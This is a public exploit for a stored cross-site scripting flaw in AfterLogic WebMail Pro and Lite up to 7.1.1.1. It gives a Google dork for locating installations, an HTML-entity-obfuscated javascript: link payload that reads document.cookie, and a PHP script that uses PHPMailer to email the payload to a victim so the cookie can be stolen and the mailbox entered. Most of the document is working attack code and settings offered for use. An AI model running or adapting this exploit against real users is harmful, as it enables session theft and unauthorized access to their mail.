AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS

<?php

/*  
# Exploit Title  : AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS
# Google Dork	 : intext:"AfterLogic" intext:"Login Information" inurl:index.php
# Date		 : 19 Jan 2014
# Exploit Author : Saeed reza Zamanian  [s.zamanian [AT] imenantivirus.com]
# Vendor Homepage: http://www.afterlogic.com/
# Software Link  : http://www.afterlogic.com/download/webmail-pro
# Version	 : <= 7.1.1.1
# Tested on	 : KALI Linux 1.0.5 (Debian) Apache/2.2.22 
# CVE 		 : vendor id = 6423

Greetz:  H.Zamanian, K.Kia, K.Khani

WebApp Desciption:
	AfterLogic WebMail is a browser-based e-mail and collaboration front end,
	designed to work with your existing messaging solutions. From an administrator&#8217;s
	perspective, the application is easy to install on your own server, easy to integrate and
	easy to maintain.


Vulnerability Description:
	XSS codes can be stored in E-Mail Body.
	So you can send an email to the Victim with below payload and steal the victim's cookie.

	<a href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert(document.cookie)>Click Me, Please...</a>\r\n

	 NOTE: javascript html char encode = &#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;

	then you will be able to get into the victim's mailbox via the url:
	http://[WebSite]/[AfterLogic]/Default.aspx

## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory:
	http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list


*/

echo "<title>AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit</title>";
require_once('class.phpmailer.php');

$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
$mail->IsSMTP(); // telling the class to use SMTP


/* SETTINGS */
$smtp_user = "username"; 	// Any valid smtp account
$smtp_pass = "password";	// Your PASSWORD
$smtp_port = "25";		// SMTP PORT Default: 25
$smtp_host = "localhost"; 	// Any valid smtp server
$from = "attacker@email.com";	// Any email
$victim = "victim@email.com";	// Victim email on afterlogic webmail.
$subject = "Salam";		// Subject

/* Body Text */
$body = '<a href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert(document.cookie)>Click Me, Please...</a>\r\n';



try {
  $mail->SMTPDebug  = 2;                  // enables SMTP debug information (for testing)
  $mail->SMTPAuth   = false;               // enable SMTP authentication
  $mail->Host       = $smtp_host;
  $mail->Port       = $smtp_port;
  $mail->Username   = $smtp_user; 	 // SMTP account username
  $mail->Password   = $smtp_pass;        // SMTP account password

  $mail->SetFrom($from, 'Attacker');
  $mail->AddReplyTo($from, 'Attacker');

  $mail->AddAddress($victim, 'Victim');
  $mail->Subject = $subject;

  $mail->MsgHTML($body);
  $mail->Send();
  echo "Message Sent OK</p>\n";
} catch (phpmailerException $e) {
  echo $e->errorMessage();
} catch (Exception $e) {
  echo $e->getMessage();
}
?>

</body>
</html>